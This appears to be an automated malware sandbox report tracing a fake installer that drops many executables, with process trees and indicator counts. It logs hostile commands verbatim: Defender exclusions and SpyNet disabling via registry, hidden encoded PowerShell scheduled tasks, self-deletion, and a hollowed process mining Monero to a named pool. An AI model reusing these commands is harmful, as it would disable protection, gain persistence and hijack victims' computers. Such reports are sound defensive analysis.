taskmgr.exeSta.exe.pifpid process 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 4484 Sta.exe.pif 4484 Sta.exe.pif 4484 Sta.exe.pif 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
Explorer.EXESystemSettings.execrsjwaaSystemSettings.exeSystemSettings.exesystemreset.exeLogonUI.exepid process 2000 Explorer.EXE 2216 SystemSettings.exe 4532 crsjwaa 2844 SystemSettings.exe 2000 Explorer.EXE 4348 SystemSettings.exe 1392 systemreset.exe 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 1472 LogonUI.exe 1472 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2228 wrote to memory of 1464 2228 setup_x86_x64_install.exe setup_installer.exe PID 2228 wrote to memory of 1464 2228 setup_x86_x64_install.exe setup_installer.exe PID 2228 wrote to memory of 1464 2228 setup_x86_x64_install.exe setup_installer.exe PID 1464 wrote to memory of 1876 1464 setup_installer.exe setup_install.exe PID 1464 wrote to memory of 1876 1464 setup_installer.exe setup_install.exe PID 1464 wrote to memory of 1876 1464 setup_installer.exe setup_install.exe PID 1876 wrote to memory of 3272 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3272 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3272 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 4092 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 4092 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 4092 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 876 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 876 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 876 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 324 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 324 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 324 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3360 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3360 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3360 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3348 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3348 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3348 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3336 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3336 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3336 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3536 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3536 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3536 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3716 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3716 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 3716 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 1476 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 1476 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 1476 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 2976 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 2976 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 2976 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 2844 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 2844 1876 setup_install.exe cmd.exe PID 1876 wrote to memory of 2844 1876 setup_install.exe cmd.exe PID 4092 wrote to memory of 1896 4092 cmd.exe Tue02522f9ea0b1.exe PID 4092 wrote to memory of 1896 4092 cmd.exe Tue02522f9ea0b1.exe PID 4092 wrote to memory of 1896 4092 cmd.exe Tue02522f9ea0b1.exe PID 3360 wrote to memory of 2036 3360 cmd.exe Tue02520f255d0ba43a.exe PID 3360 wrote to memory of 2036 3360 cmd.exe Tue02520f255d0ba43a.exe PID 3360 wrote to memory of 2036 3360 cmd.exe Tue02520f255d0ba43a.exe PID 2976 wrote to memory of 1720 2976 cmd.exe Tue029560e6534e190c.exe PID 2976 wrote to memory of 1720 2976 cmd.exe Tue029560e6534e190c.exe PID 2976 wrote to memory of 1720 2976 cmd.exe Tue029560e6534e190c.exe PID 324 wrote to memory of 1716 324 cmd.exe Tue02976fcdf1.exe PID 324 wrote to memory of 1716 324 cmd.exe Tue02976fcdf1.exe PID 3336 wrote to memory of 3884 3336 cmd.exe Tue026e94a5005f8.exe PID 3336 wrote to memory of 3884 3336 cmd.exe Tue026e94a5005f8.exe PID 3336 wrote to memory of 3884 3336 cmd.exe Tue026e94a5005f8.exe PID 876 wrote to memory of 1784 876 cmd.exe Tue028a363eda.exe PID 876 wrote to memory of 1784 876 cmd.exe Tue028a363eda.exe PID 876 wrote to memory of 1784 876 cmd.exe Tue028a363eda.exe PID 1476 wrote to memory of 1488 1476 cmd.exe Tue026e182673.exe PID 1476 wrote to memory of 1488 1476 cmd.exe Tue026e182673.exe PID 1476 wrote to memory of 1488 1476 cmd.exe Tue026e182673.exe PID 3348 wrote to memory of 1972 3348 cmd.exe Tue02dc626f48.exe PID 3348 wrote to memory of 1972 3348 cmd.exe Tue02dc626f48.exe -
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02dc626f48.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02dc626f48.exeTue02dc626f48.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02520f255d0ba43a.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02520f255d0ba43a.exeTue02520f255d0ba43a.exe6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\t_UEXELzGE7DbXhkp8qBnR5m.exe"C:\Users\Admin\Pictures\Adobe Films\t_UEXELzGE7DbXhkp8qBnR5m.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\b1cDQg13UfnHvP3tcBRz5px4.exe"C:\Users\Admin\Pictures\Adobe Films\b1cDQg13UfnHvP3tcBRz5px4.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\_VvUFRCH9UisvltNwRoKUsNE.exe"C:\Users\Admin\Documents\_VvUFRCH9UisvltNwRoKUsNE.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\VnhWpFrjndsEQSHw1Fiiuf_K.exe"C:\Users\Admin\Pictures\Adobe Films\VnhWpFrjndsEQSHw1Fiiuf_K.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 6648⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 6768⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 7768⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 8128⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 11688⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 11408⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 12408⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 12768⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 13608⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 13408⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\teDWWAvXpTgtaccLQ7oDU6_x.exe"C:\Users\Admin\Pictures\Adobe Films\teDWWAvXpTgtaccLQ7oDU6_x.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\JSthivfecrVkij8le8iLb8Jj.exe"C:\Users\Admin\Pictures\Adobe Films\JSthivfecrVkij8le8iLb8Jj.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\6Z8jGP9JdcNM41nkfPAclin_.exe"C:\Users\Admin\Pictures\Adobe Films\6Z8jGP9JdcNM41nkfPAclin_.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 4208⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 4288⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\lQk6PJJ6IdIOShPMwmGSQdRe.exe"C:\Users\Admin\Pictures\Adobe Films\lQk6PJJ6IdIOShPMwmGSQdRe.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 4208⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 3928⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\DLJxTyWdA96FYpKDUbbRfhM6.exe"C:\Users\Admin\Pictures\Adobe Films\DLJxTyWdA96FYpKDUbbRfhM6.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla8⤵
-
C:\Windows\SysWOW64\cmd.execmd9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"10⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"10⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"10⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"10⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla10⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pifSta.exe.pif V10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\waitfor.exewaitfor /t 5 MsGxuGavEVaQbserVWhrA10⤵
-
C:\Users\Admin\Pictures\Adobe Films\oi_Ha1TSBtEp0LheSeHKliDI.exe"C:\Users\Admin\Pictures\Adobe Films\oi_Ha1TSBtEp0LheSeHKliDI.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS3C80.tmp\Install.exe.\Install.exe8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS570D.tmp\Install.exe.\Install.exe /S /site_id "525403"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&11⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3212⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6412⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&11⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3212⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6412⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHuhsQgmZ" /SC once /ST 00:16:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="10⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHuhsQgmZ"10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHuhsQgmZ"10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnHoQpKIlSSCUFQrDN" /SC once /ST 11:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\KtGVHBl.exe\" Sk /site_id 525403 /S" /V1 /F10⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\nJ_ERnYUI2Uvt80SCgTC9FDe.exe"C:\Users\Admin\Pictures\Adobe Films\nJ_ERnYUI2Uvt80SCgTC9FDe.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\S4ax8IMw6V0VoIGOVarOFSo6.exe"C:\Users\Admin\Pictures\Adobe Films\S4ax8IMw6V0VoIGOVarOFSo6.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im S4ax8IMw6V0VoIGOVarOFSo6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\S4ax8IMw6V0VoIGOVarOFSo6.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im S4ax8IMw6V0VoIGOVarOFSo6.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\HRkfNmSVyuwfj3qC_X5aJD9W.exe"C:\Users\Admin\Pictures\Adobe Films\HRkfNmSVyuwfj3qC_X5aJD9W.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DAVAIBABKI.exe"C:\Users\Admin\AppData\Local\Temp\DAVAIBABKI.exe"8⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\QvXnoSGSfnW5mN4JVw_1TpjD.exe"C:\Users\Admin\Pictures\Adobe Films\QvXnoSGSfnW5mN4JVw_1TpjD.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 458⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 459⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\Rkeagtomax1.exe"C:\Users\Admin\AppData\Local\Temp\Rkeagtomax1.exe"8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02976fcdf1.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02976fcdf1.exeTue02976fcdf1.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue028a363eda.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue028a363eda.exeTue028a363eda.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02522f9ea0b1.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02522f9ea0b1.exeTue02522f9ea0b1.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue026e94a5005f8.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e94a5005f8.exeTue026e94a5005f8.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e94a5005f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e94a5005f8.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e94a5005f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e94a5005f8.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e94a5005f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e94a5005f8.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0289c99651.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue0289c99651.exeTue0289c99651.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue029560e6534e190c.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue029560e6534e190c.exeTue029560e6534e190c.exe6⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 9327⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue026e182673.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e182673.exeTue026e182673.exe /mixone6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 6567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 7727⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 7447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 8207⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 8407⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 9207⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 11647⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 12967⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 13087⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 12687⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02b2110095fe706.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02b2110095fe706.exeTue02b2110095fe706.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-E7BQR.tmp\Tue02b2110095fe706.tmp"C:\Users\Admin\AppData\Local\Temp\is-E7BQR.tmp\Tue02b2110095fe706.tmp" /SL5="$10226,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02b2110095fe706.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02705f9c2b455.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02705f9c2b455.exeTue02705f9c2b455.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 5125⤵
- Program crash
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\C794.exeC:\Users\Admin\AppData\Local\Temp\C794.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 453⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\timeout.exetimeout 454⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\C794.exeC:\Users\Admin\AppData\Local\Temp\C794.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1AA==4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 441CB6TueBLX7ncXtmPZsvJ2hPCJ9V53ziAdFkGHBKnG4DLjUqoNo94KHXd3NUR8K2AMQF7Apmy1HCvRpNv5K1M6MDVDNbF.workgroop -p x --tls --algo rx/0 --cpu-max-threads-hint=504⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3712 -s 4725⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3712 -s 4405⤵
- Program crash
-
